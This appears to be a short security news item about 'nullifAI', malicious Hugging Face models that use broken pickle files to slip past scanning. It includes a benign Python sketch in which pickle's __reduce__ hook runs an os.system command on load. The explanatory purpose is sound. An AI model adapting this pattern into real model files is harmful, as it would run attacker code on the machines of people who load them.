Researchers have identified malicious machine learning (ML) models on Hugging Face that leverage a novel technique involving ‘broken’ pickle files to evade detection. The attack, dubbed ‘nullifAI’, abuses Python’s pickle serialization format, which allows arbitrary Python code to execute during ML model deserialization. The malicious models were not initially flagged as unsafe by Hugging Face’s security mechanisms.
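To illustrate the underlying risk rather than the specific nullifAI payload, the minimal Python sketch below shows how pickle’s `__reduce__` hook lets a serialized object run an arbitrary command the moment it is deserialized; the class name and the command used here are hypothetical examples.

```python
import pickle


class MaliciousPayload:
    """Hypothetical object demonstrating pickle's code-execution behavior."""

    def __reduce__(self):
        # __reduce__ tells pickle how to reconstruct this object.
        # Returning (callable, args) makes pickle invoke that callable
        # with those args at load time -- here, an os.system call.
        import os
        return (os.system, ("echo 'code executed during unpickling'",))


# Serialize the object, as it might be embedded inside a model file.
payload_bytes = pickle.dumps(MaliciousPayload())

# Simply deserializing the bytes triggers the embedded command;
# no method on the object is ever called explicitly.
pickle.loads(payload_bytes)
```

Because frameworks that store models in pickle-based formats run this reconstruction logic automatically when a checkpoint is loaded, merely opening an untrusted model file can be enough to execute attacker-supplied code.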